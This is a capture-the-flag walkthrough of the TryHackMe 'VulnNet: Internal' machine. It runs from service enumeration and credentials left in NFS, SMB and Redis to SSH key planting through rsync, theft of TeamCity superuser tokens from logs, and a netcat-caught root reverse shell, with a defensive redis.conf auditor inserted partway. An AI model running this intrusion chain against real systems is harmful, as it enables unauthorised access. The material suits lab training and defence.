- Modified
- Room author: TheCyb3rW0lf
- Operating system: Linux (required)
- Difficulty: Easy/Medium
LINK: https://tryhackme.com/room/vulnnetinternal
Description:
VulnNet Entertainment is a company that learns from its mistakes. They quickly realized they could not build a properly secured web application, so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you are tasked with performing a penetration test of their network and reporting your findings.
This machine was designed to be the exact opposite of the previous machines in this series and focuses on internal services. It should show you how to recover interesting information and use it to gain access to the system. Report your findings by submitting the correct flags.
LET'S START BY FINDING THE SERVICES FLAG:
We start right away with an Nmap scan for open ports:
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_  256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp   open     rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35973/tcp   mountd
|   100005  1,2,3      50743/udp   mountd
|   100005  1,2,3      50821/tcp6  mountd
|   100005  1,2,3      60228/udp6  mountd
|   100021  1,3,4      33804/udp6  nlockmgr
|   100021  1,3,4      35968/udp   nlockmgr
|   100021  1,3,4      38965/tcp6  nlockmgr
|   100021  1,3,4      44305/tcp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open     rsync       (protocol version 31)
2049/tcp  open     nfs_acl     3 (RPC #100227)
6379/tcp  open     redis       Redis key-value store
9090/tcp  filtered zeus-admin
35973/tcp open     mountd      1-3 (RPC #100005)
39613/tcp open     mountd      1-3 (RPC #100005)
42041/tcp open     java-rmi    Java RMI
44305/tcp open     nlockmgr    1-4 (RPC #100021)
49833/tcp open     mountd      1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's list the Samba shares:
┌──(user㉿parrot)-[/data/VulnNet_Internal]
└─$ smbclient -L 10.10.190.83
Enter WORKGROUP\kali's password:

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	shares          Disk      VulnNet Business Shares
	IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Fortunately we can log in without credentials and read the contents of services.txt, which holds the flag we need:
┌──(user㉿parrot)-[/data/VulnNet_Internal]
└─$ smbclient //10.10.190.83/shares
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Feb  2 10:20:09 2021
  ..                                  D        0  Tue Feb  2 10:28:11 2021
  temp                                D        0  Sat Feb  6 12:45:10 2021
  data                                D        0  Tue Feb  2 10:27:33 2021

		11309648 blocks of size 1024. 3275768 blocks available
smb: \> cd temp
smb: \temp\> ls
  .                                   D        0  Sat Feb  6 12:45:10 2021
  ..                                  D        0  Tue Feb  2 10:20:09 2021
  services.txt                        N       38  Sat Feb  6 12:45:09 2021

		11309648 blocks of size 1024. 3275768 blocks available
smb: \temp\> get services.txt -
THM{0a09d51e488f5fa105d8d866a497440a}
getting file \temp\services.txt of size 38 as - (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
So we have found the FLAG:
THM{0a09d51e488f5fa105d8d866a497440a}
LET'S MOVE ON TO THE INTERNAL FLAG:
The Nmap scan revealed an NFS share; we mount it and look at its contents:
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ mkdir tmp/
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ sudo mount -t nfs 10.10.190.83: tmp
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ tree tmp
tmp
└── opt
    └── conf
        ├── hp
        │   └── hplip.conf
        ├── init
        │   ├── anacron.conf
        │   ├── lightdm.conf
        │   └── whoopsie.conf
        ├── opt
        ├── profile.d
        │   ├── bash_completion.sh
        │   ├── cedilla-portuguese.sh
        │   ├── input-method-config.sh
        │   └── vte-2.91.sh
        ├── redis
        │   └── redis.conf
        ├── vim
        │   ├── vimrc
        │   └── vimrc.tiny
        └── wildmidi
            └── wildmidi.cfg
Note that redis.conf contains the password for the Redis server:
┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
└─$ grep -Ev "^#|^$" redis.conf
rename-command FLUSHDB ""
rename-command FLUSHALL ""
bind 127.0.0.1 ::1
protected-mode yes
port 6379
tcp-backlog 511
timeout 0
tcp-keepalive 300
daemonize yes
supervised no
pidfile /var/run/redis/redis-server.pid
loglevel notice
logfile /var/log/redis/redis-server.log
databases 16
always-show-logo yes
save 900 1
save 300 10
save 60 10000
stop-writes-on-bgsave-error yes
rdbcompression yes
rdbchecksum yes
dbfilename dump.rdb
dir /var/lib/redis
slave-serve-stale-data yes
requirepass "B65Hx562F@ggAZ@F"      <-------------------- password
slave-read-only yes
repl-diskless-sync no
repl-diskless-sync-delay 5
repl-disable-tcp-nodelay no
slave-priority 100
lazyfree-lazy-eviction no
lazyfree-lazy-expire no
lazyfree-lazy-server-del no
slave-lazy-flush no
appendonly no
appendfilename "appendonly.aof"
appendfsync everysec
no-appendfsync-on-rewrite no
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
aof-load-truncated yes
aof-use-rdb-preamble no
lua-time-limit 5000
slowlog-log-slower-than 10000
slowlog-max-len 128
latency-monitor-threshold 0
notify-keyspace-events ""
hash-max-ziplist-entries 512
hash-max-ziplist-value 64
list-max-ziplist-size -2
list-compress-depth 0
set-max-intset-entries 512
zset-max-ziplist-entries 128
zset-max-ziplist-value 64
hll-sparse-max-bytes 3000
activerehashing yes
client-output-buffer-limit normal 0 0 0
client-output-buffer-limit slave 256mb 64mb 60
client-output-buffer-limit pubsub 32mb 8mb 60
hz 10
aof-rewrite-incremental-fsync yes
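As an added example (not part of the original writeup), a small auditor for a recovered redis.conf like the one above: it flags a plaintext requirepass (the file itself becomes a secret, so the directory holding it must not sit in a readable NFS or SMB export), non-loopback bind addresses, protected-mode off, and dangerous commands left under their real names. The sample config is constructed with a placeholder password; note that this file binds to loopback while the ss output later on the box shows Redis listening on 0.0.0.0:6379, so an exported copy is not necessarily the running configuration.

```python
import shlex
from typing import Dict, List

# Constructed sample (password replaced by a placeholder), in the same form as the
# redis.conf recovered from the NFS export; only the directives the audit looks at.
SAMPLE_REDIS_CONF = """\
rename-command FLUSHDB ""
rename-command FLUSHALL ""
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass "<REDACTED_PASSWORD>"
"""

def parse_redis_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive to the argument lists it was given (repeats such as
    rename-command and save are kept); comments and blank lines are skipped."""
    directives: Dict[str, List[List[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)          # resolves the quoted "" and "..." values
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives

def audit_redis_conf(text: str) -> List[str]:
    """Return the findings a defender would act on for this config file."""
    conf = parse_redis_conf(text)
    findings: List[str] = []
    # A requirepass line is good for Redis but turns the file into a secret:
    # anyone who can mount the NFS export or read the SMB share now has the password.
    if "requirepass" in conf:
        findings.append("requirepass is set: restrict permissions and exports of the "
                        "directory holding this file")
    else:
        findings.append("requirepass is not set: any client reaching the port is authenticated")
    # Listening addresses declared in the file. The exported copy may differ from the
    # running instance, so confirm with ss -ltp on the host (here it showed 0.0.0.0:6379).
    binds = [addr for args in conf.get("bind", []) for addr in args]
    if not binds or any(a in ("0.0.0.0", "::", "*") for a in binds):
        findings.append("bind allows non-loopback clients")
    if conf.get("protected-mode", [["yes"]])[0][0].lower() != "yes":
        findings.append("protected-mode is off")
    # Commands that were not renamed or disabled with rename-command.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for cmd in ("FLUSHALL", "FLUSHDB", "CONFIG", "DEBUG"):
        if cmd not in renamed:
            findings.append(f"{cmd} is reachable under its real name")
    return findings
```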
Let's connect to Redis with that password and look for the flag:
┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> ping
PONG
10.10.190.83:6379> KEYS *
1) "tmp"
2) "marketlist"
3) "authlist"
4) "internal flag"
5) "int"
10.10.190.83:6379> KEYS "internal flag"
1) "internal flag"
10.10.190.83:6379> GET "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"
The flag is:
THM{ff8e518addbbddb74531a724236a8221}
USER FLAG:
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "int"
5) "tmp"
10.10.190.83:6379> GET authlist
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.190.83:6379> LRANGE authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
10.10.190.83:6379>
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83
files           Necessary home interaction
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ cp ~/.ssh/id_rsa.pub authorized_keys
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync authorized_keys rsync://rsync-connect@10.10.190.83/files/sys-internal/.ssh
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ ssh sys-internal@10.10.190.83
sys-internal@vulnnet-internal:~$ cat user.txt
THM{da7c20696831f253e0afaca8b83c07ab}
USER FLAG: THM{da7c20696831f253e0afaca8b83c07ab}
ROOT FLAG:
sys-internal@vulnnet-internal:/$ ls -la /
total 533824
drwxr-xr-x 24 root root 4096 Feb 6 12:58 ./
drwxr-xr-x 24 root root 4096 Feb 6 12:58 ../
drwxr-xr-x 2 root root 4096 Feb 2 14:05 bin/
drwxr-xr-x 3 root root 4096 Feb 1 14:02 boot/
drwx------ 2 root root 4096 Feb 1 13:41 .cache/
drwxr-xr-x 17 root root 3720 May 27 07:34 dev/
drwxr-xr-x 129 root root 12288 Feb 7 19:21 etc/
drwxr-xr-x 3 root root 4096 Feb 1 13:51 home/
lrwxrwxrwx 1 root root 34 Feb 1 14:01 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx 1 root root 33 Feb 1 13:30 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x 18 root root 4096 Feb 1 13:43 lib/
drwxr-xr-x 2 root root 4096 Feb 1 13:28 lib64/
drwx------ 2 root root 16384 Feb 1 13:27 lost+found/
drwxr-xr-x 4 root root 4096 Feb 2 10:49 media/
drwxr-xr-x 2 root root 4096 Feb 1 13:27 mnt/
drwxr-xr-x 4 root root 4096 Feb 2 10:28 opt/
dr-xr-xr-x 136 root root 0 May 27 07:33 proc/
drwx------ 8 root root 4096 Feb 6 13:32 root/
drwxr-xr-x 27 root root 880 May 27 08:37 run/
drwxr-xr-x 2 root root 4096 Feb 2 14:06 sbin/
drwxr-xr-x 2 root root 4096 Feb 1 13:27 srv/
-rw------- 1 root root 546529280 Feb 1 13:27 swapfile
dr-xr-xr-x 13 root root 0 May 27 08:39 sys/
drwxr-xr-x 12 root root 4096 Feb 6 13:30 TeamCity/ <----------------------- interesting
drwxrwxrwt 11 root root 4096 May 27 08:40 tmp/
drwxr-xr-x 10 root root 4096 Feb 1 13:27 usr/
drwxr-xr-x 13 root root 4096 Feb 1 13:43 var/
lrwxrwxrwx 1 root root 31 Feb 1 14:01 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx 1 root root 30 Feb 1 13:30 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic
sys-internal@vulnnet-internal:~$ ss -ltp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 0.0.0.0:microsoft-ds 0.0.0.0:*
LISTEN 0 128 0.0.0.0:39391 0.0.0.0:*
LISTEN 0 64 0.0.0.0:nfs 0.0.0.0:*
LISTEN 0 128 0.0.0.0:33735 0.0.0.0:*
LISTEN 0 5 0.0.0.0:rsync 0.0.0.0:*
LISTEN 0 50 0.0.0.0:netbios-ssn 0.0.0.0:*
LISTEN 0 128 0.0.0.0:6379 0.0.0.0:*
LISTEN 0 128 0.0.0.0:sunrpc 0.0.0.0:*
LISTEN 0 64 0.0.0.0:34769 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:domain 0.0.0.0:*
LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
LISTEN 0 5 127.0.0.1:ipp 0.0.0.0:*
LISTEN 0 128 0.0.0.0:33145 0.0.0.0:*
LISTEN 0 50 [::ffff:127.0.0.1]:57882 *:*
LISTEN 0 50 [::]:microsoft-ds [::]:*
LISTEN 0 64 [::]:nfs [::]:*
LISTEN 0 50 *:9090 *:*
LISTEN 0 1 [::ffff:127.0.0.1]:8105 *:*
LISTEN 0 5 [::]:rsync [::]:*
LISTEN 0 128 [::1]:6379 [::]:*
LISTEN 0 50 [::]:netbios-ssn [::]:*
LISTEN 0 100 [::ffff:127.0.0.1]:8111 *:* <------------ TeamCity running on localhost on port 8111
LISTEN 0 128 [::]:sunrpc [::]:*
LISTEN 0 64 [::]:33363 [::]:*
LISTEN 0 128 [::]:40659 [::]:*
LISTEN 0 128 [::]:ssh [::]:*
LISTEN 0 50 *:35095 *:*
LISTEN 0 128 [::]:38359 [::]:*
LISTEN 0 5 [::1]:ipp [::]:*
LISTEN 0 128 [::]:46425 [::]:*
$ ssh -L 8111:127.0.0.1:8111 sys-internal@10.10.190.83
sys-internal@vulnnet-internal:/TeamCity$ grep -iR token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.190.83] 48482
bash: cannot set terminal process group (481): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
ROOT FLAG: THM{e8996faea46df09dba5676dd271c60bd}